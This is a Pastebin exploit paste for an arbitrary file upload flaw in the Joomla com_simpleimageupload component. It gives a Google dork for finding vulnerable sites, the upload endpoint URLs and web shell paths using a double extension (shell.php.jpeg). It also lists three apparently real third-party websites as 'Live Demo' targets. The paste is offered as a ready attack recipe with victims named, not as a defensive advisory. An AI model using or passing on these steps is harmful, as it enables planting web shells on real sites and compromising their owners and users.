Advertisement
3xploit3r

Joomla (com_simpleimageupload) File Upload

Aug 26th, 2016
353
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ,------. ,--. ,-----. ,--.
  2. | .-. \ ,---. ,--,--. ,-| | ,---. ' .-. ',--.,--.| |
  3. | | \ :| .-. :' ,-. |' .-. |( .-' | | | || || || |
  4. | '--' /\ --.\ '-' |\ `-' |.-' `)' '-' '' '' '| |
  5. `-------' `----' `--`--' `---' `----' `-----' `----' `--'
  6. dead_s0ul@outlook.com
  7.  
  8. Category web applications
  9. Platform php
  10. # Exploit Title: Joomla (com_simpleimageupload) File Upload Vulnerability
  11. # Date: 05/11/2014
  12. # Exploit Author: Donnazmi
  13. # Tested on: Windows + Linux
  14. # Google dork: inurl:/index.php?option=com_simpleimageupload
  15. ------------------------------------------------------------------------
  16.  
  17. # Exploit
  18. # -Live HTTP Header-
  19.  
  20. 1)
  21. http://localhost/path/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext
  22. 2)
  23. http://localhost/path/administrator/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext
  24.  
  25. Live Demo :
  26. http://www.bonyadtabari.ir/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext
  27. http://phurithat.ac.th/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_content
  28. http://www.aviatime.com/en/people/administrator/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext
  29.  
  30. # Shell path:
  31. http://localhost/path/images/pic/shell.php.jpeg
  32. http://localhost/path/images/shell.php.jpeg
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement